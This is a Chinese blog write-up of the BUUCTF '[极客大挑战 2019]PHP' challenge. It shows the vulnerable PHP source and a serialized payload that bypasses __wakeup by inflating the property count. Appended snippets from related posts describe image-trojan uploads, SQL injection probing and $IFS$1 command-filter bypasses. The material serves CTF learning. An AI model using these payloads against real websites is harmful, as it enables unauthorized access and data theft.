[极客大挑战 2019]PHP 1

最新推荐文章于 2025-02-11 20:57:18 发布
最新推荐文章于 2025-02-11 20:57:18 发布
阅读量8.8k 收藏 26
点赞数 10
分类专栏: buuctf 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62879498/article/details/124129841
版权
本文探讨如何通过构造payload,利用PHP的__construct和__wakeup函数绕过网站安全机制,访问隐藏的flag.php文件。关键在于理解如何调整对象属性以避开检查,最终成功获取网站敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[极客大挑战 2019]PHP 1

一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯”
在这里插入图片描述

所以我们尝试着输入网站源码备份文件,看看能否访问

常见的网站源码备份文件后缀:

tar.gz,zip,rar,tar

常见的网站源码备份文件名:

web,website,backup,back,www,wwwroot,temp

发现www.zip可以成功获得网站源码备份

下载后,发现有3个php文件
在这里插入图片描述

我们先访问一下 index.php文件,发现:

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

发现文件包含 class.php 文件 并且文件是get 传参,参数为 select

unserialize():

  • unserialize — 从已存储的表示中创建 PHP 的值列化后的字符串。

若被反序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wakeup()成员函数(如果存在的话)

访问 class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

发现php文件中包含 flag.php

并且 设置两个私有变量 ,利用 __construct 构造函数 来进行一个一一对应的关系

之后__wakeup() 让 username 变量等于 guest

在类结束的时候,调用__desctruct()函数 ,如果这个 password不等于100 ,就会输出 username…

password… ,退出函数。如果 username= admine 就会输出 flag 否则 失败。

在本题的关键,就是username的赋值 因为 __wakeup 会对userneme进行一次赋值,所以我们要想办法绕过该函数, 并且在一开始我们要改变 username的赋值

当成员属性数目大于实际数目时可绕过wakeup方法

在这里,我们可以将 php 代码 以文本的方式显示

[推荐网站](php代码在线测试,php在线执行 (dooccn.com))

构造payload:

<?php
class Name{
    private $username = 'admine';
    private $password = '100';
    }
 $select = new Name();
 $res=serialize(@$select);   
 echo $res
?>

以文本方式显示就是:

O:4:"Name":2:{s:14:"口Name口username";s:6:"admine";s:14:"口Name口password";s:3:"100";}

因为前面我们说过 当成员属性数目大于实际数目时才可绕过wakeup

所以我们要将 2 改为 3 或者 比二大的数字

同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

在这里插入图片描述

【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 7339
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 762
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[极客挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 580
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
[极客挑战 2019]PHP1
keaixiaohan的博客
07-23 397
进入网址之后如下: 从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件 首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $us.
Bugku CTF
weixin_44512852的博客
09-29 277
web GET 进入环境是一个php代码,用GET方式给what赋值,要求what==flag 得到了flag 计算机 打开环境,是一个计算题和一个输入答案的框子,如图这个加法的结果是151,在输入中发现输入框只能输入一个字符 这里可以按F12,通过左上角小指针定位输入框,然后修改input标签中maxlength值,>=3即可 在答案框输入答案验证即可 得到flag:flag{bef79d16e6359d6e4e6a8763a9cf41d0} POST 和前面GET那题很像,这里要求的po
NSSCTF做题
wwwwyyyrre的博客
09-24 848
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
[极客挑战 2019]PHP
weixin_53146913的博客
04-06 1979
有备份的好习惯,扫描目录得到www.zip 几个重要php文件内容: index.php 1 <?php 2 include ‘class.php‘; 3 $select = $_GET[‘select‘]; 4 $res=unserialize(@$select); 5 ?> 代码第4行unserialize可能存在反序列化漏洞 class.php 1 <?php 2 include ‘flag.php‘; 3 error_reporting
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 832
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
2025.2.11——一、[极客挑战 2019]PHP wakeup绕过|备份文件|代码审计
最新发布
2402_87387800的博客
02-11 1082
题目来源:BUUCTF [极客挑战 2019]PHP
CTF练习
m0_74342099的博客
11-20 80
IFS$1 //$1改成$加其他数字貌似都行IFS< <> {cat,flag.php} //用逗号实现了空格功能,需要用{}括起来%20 (space)%09 (tab)cat$IFS$1fla$a.php 网页源码找到flag。cat$IFS$1f$aag.php 网页源码无flag。可以发现没有过滤符号,较为简单,接下来就是遍历目录,cd ../../../;cat$IFS$1$alag.php 过滤。cat$IFS$1fl$ag.php 过滤。于是尝试最终使用$IFS$1成功。
极客挑战 2019 PHP
01-03
### 极客挑战 2019 PHP 比赛详情 #### 文件上传与图片马利用 在极客挑战2019中,存在一道涉及文件上传漏洞的题目。攻击者可以通过特定技术手段绕过服务器端的安全检查机制来实现恶意代码的上传并执行。具体来说,通过文件头及文件内容检测的方式,将后缀名为`.jpg`的文件成功上传至服务器[^3]。 为了进一步提升攻击效果,还可以采用DOS命令组合不同类型的文件创建所谓的“图片马”。例如使用如下命令: ```bash copy 1.jpg/a+php.php/b php.jpg ``` 此操作会把一张正常图像文件同包含PHP脚本的内容合并成一个新的复合文件,在某些配置不当的服务环境中能够被执行从而达到远程控制的目的。经过测试确认,除了常见的`.php`扩展名外,像`.phtml`这样的变种同样会被解释器识别处理。 #### SQL注入技巧探讨 另一类值得关注的是关于SQL注入方面的考察点。对于可能存在此类风险的应用程序接口而言,了解如何根据返回错误提示推测数据库查询结构是一项重要技能。当面对含有多个参数的情况时,则需尝试分别提交诸如整数、字符串等形式的数据片段去观察响应变化规律,进而推断出完整的SQL表达式构成模式[^4]。 ```sql SELECT * FROM users WHERE id = '1' AND username='admin' ``` 上述例子展示了基本形式下的条件拼接逻辑;而在实际竞赛场景里,选手们往往要应对更复杂多样的情形,比如嵌套子查询或者联合查询等高级语法应用场合下所引发的各种异常状况分析工作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值